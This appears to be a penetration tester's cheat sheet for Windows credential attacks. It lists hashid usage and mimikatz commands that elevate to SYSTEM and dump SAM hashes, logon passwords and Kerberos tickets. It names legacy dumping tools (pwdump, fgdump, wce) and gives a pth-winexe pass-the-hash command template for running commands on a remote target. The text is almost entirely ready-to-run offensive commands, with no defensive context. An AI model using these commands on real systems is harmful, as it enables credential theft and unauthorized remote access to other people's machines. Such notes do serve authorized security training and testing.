hashid - gives you the type of the hash

hashid <hash>


# useful mimikatz commands

privilege::debug # requires admin; allows for SAM inspection (hashes, tickets,etc)

token::elevate # goes from admin (high itegrity) to system (system integrity)

lsadump::sam # dumps the content of SAM database (local accounts)

sekurlsa::logonpasswords # dumps the hashes (domain accounts)
sekurlsa::tickets # dumps the tickes

other hash dumping tools

For older versions of Windows (XP or 2003), use: pwdump, fgdump or wce

wce (windows credential edirot) # works on older Windows, e.g. XP, 2003

Passing the Hash in Windows

pth-winexe -U
<username>%<NTLM>:<NTLM> //<target_ip> <command>